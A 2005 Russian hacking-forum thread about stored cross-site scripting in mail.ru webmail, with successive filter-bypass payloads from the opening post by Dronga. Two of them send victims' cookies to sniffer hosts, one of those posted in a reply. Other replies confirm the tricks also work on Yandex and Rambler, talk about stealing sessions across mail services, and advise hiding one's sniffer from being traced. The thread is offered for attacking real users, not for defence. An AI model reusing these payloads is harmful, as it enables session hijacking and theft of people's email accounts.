Активная XSS на mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by Dronga, 4 Dec 2005.

  1. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Заранее прошу прощения у модераторов за дублирование темы, просто на мой взгляд в этом разделе следует выкладывать _готовые_ уязвимости, а не задавать вопросы по их поиску.

    Антология XSS на mail.ru

    Не знаю, может кому пригодится, но эволюция фильтра на mail.ru протекала следующим образом. На момент моей регистрации на античате перестала действовать фишка.
    PHP:
    <image src=JaVaScRiPt:alert()>
    Все были очень удивлены :p Эта бага держалась очень долго...
    Следущая ошибка была найдена мной, помог мне Майор, она работала под IE, а я тестил под Оперой) Майор проверил под IE, я ему сперва даже не поверил) Брался fail.txt, в нем в наглую прописывалось:
    PHP:
    <script>alert()</script>
    и всё это дело переименовывалось в fail.jpg. Но эту филонку сравнительно быстро прекрыли...

    Следующим шагом стал пост уже не помню кого... =) Если напомните, то будет хорошо) XSS проходила благодаря двойному кодированию в ASCII слова javascript. При этом этаже бага была одновременно актуальна и для yandex.ru =) Выглядело это так:
    PHP:
     <img src="http://server.com/picture.jpg" dynsrc="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54:document.images[0].src='http://sniffer.com/sniff.php?cook='+document.cookie">
    К сожалению, всё что ушло в большой паблик долго не живет =)

    И тут снова Майор, умнейший человек) Я долго ругался когда он мне одному из первых поведал о собственном открытии) Всё было просто и изящно... Чтобы закрыть предыдущую багу, фильтр на Mail.ru стал до бесконечности раскодировать то что закодировано в ASCII... Тогда Майор половину слова javascript закодировал в ASCII и отдельно ещё раз зашифровал каждый символ &. А другую половину поставил через знак табуляции... И фильтр терялся... Выглядело это так:
    PHP:
    <bgsound src="&#38#106&#38#97&#38#118&#38#97&#38#115&#38#99&#38#114    ipt:alert()" loop=5>
    Но и эта уязвимость будучи выложенной долго не продержалась. И вот эта тема коснулась меня) Всю ночь убил на поиски, эксперименты... Мозги уже не варят. XSS выглядит следующим образом:
    PHP:
    <font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">
    Вот) Активная, в теле письма... Конечно она ещё сыровата, но общая конструкция видна. В таком виде работает вроде только под ИЕ, сколько не пытался под оперу заточить - бесполезно... Кто будет пробовать - советую поиграть с символами " и `. Что-то типа вот так: color=`green"style

    Конечно, может кто-то что-то и покруче нашел, что для всех браузеров применимо, но что я нашел тем и поделился.

    PS. Не забываем о приватности раздела и доверии друг другу.
     
    #1 Dronga, 4 Dec 2005
    Last edited: 4 Dec 2005
    27 people like this.
  2. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    респект, проверим седня
     
  3. grinay

    grinay IQ- 137%

    Joined:
    15 Jun 2004
    Messages:
    409
    Likes Received:
    174
    Reputations:
    305
    Молоток плюсик те:)
     
  4. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    сейчас потестим:):):)
     
    _________________________
  5. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    ну вот=) в МОА только достойнейшие=)
     
  6. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    По мойму дело рук Майора, или ЛиттлЛамера что-то не припомню...
    А плюс щас поставим...
     
  7. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Странно, у меня не работает, последние скобки заменяются на подмигивающий смайл.
    Добавлено:
    Точно про разметку забыл, гост спасибо
     
    #7 kot777, 4 Dec 2005
    Last edited: 4 Dec 2005
  8. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    каким браузером тестил? хотя скорее всего ты разметку <html></html> не делал, да?
     
  9. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Ребята, всё работает, заходим в раздел E-mail->FAQ, скачиваем програмку XSSTester от LittleLamer, удаляем всё что там забито по дефолту и вставляем мой вариант, ничего не дописываем (никаких <html></html> не надо, их фильтр нещадно режет, вставляем одну единственную строчку - саму XSS). Забиваем информацию для отправки и отправляем. Идем проверяем, ещё раз напоминаю что актуально в таком виде только для IE (у меня IE6 SP2).
     
    #9 Dronga, 4 Dec 2005
    Last edited: 5 Jan 2006
  10. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.
     
  11. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Может что у меня sp1 один стоит поэтому косяки по идее нормально всё должно!
     
  12. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Dronga респект!!!

    Держи:
    PHP:
    <font color="green>"style="font-size:1px;background:url\(java/**/script:document.images[0].src='http://privatesniff/s.jpg?'+document.cookie)"
     
    2 people like this.
  13. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    А я видео снял про XSS на yandex.ru смотрите в разделе видео.
     
  14. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    891
    Likes Received:
    300
    Reputations:
    530
    Я ващет прячу под кодировкой свой снифф. Чего и всем советую. Меня так один раз вычислили когда указал свой снифф.
    Пантер, стуканись плз в аську, дело есть.
     
  15. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    саняХ поди такая же бага? ;)
    а вообще не поленись - напиши еще, мне вот видео влом качать...
     
  16. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))
     
  17. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    кстати бага дрона и на рамблере сработала!)
     
  18. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    891
    Likes Received:
    300
    Reputations:
    530
    А какая? =)
    Принцип один и тот же.
     
  19. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Аха точно всё работает прикольно почти на всех почтовых службах можно сесию угнать прикольно!!!
     
  20. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Что то я тебя не понял не много! Ты имеешь ввиду активная или пассивная. Активная там. Вообщем посмотри лучше видео.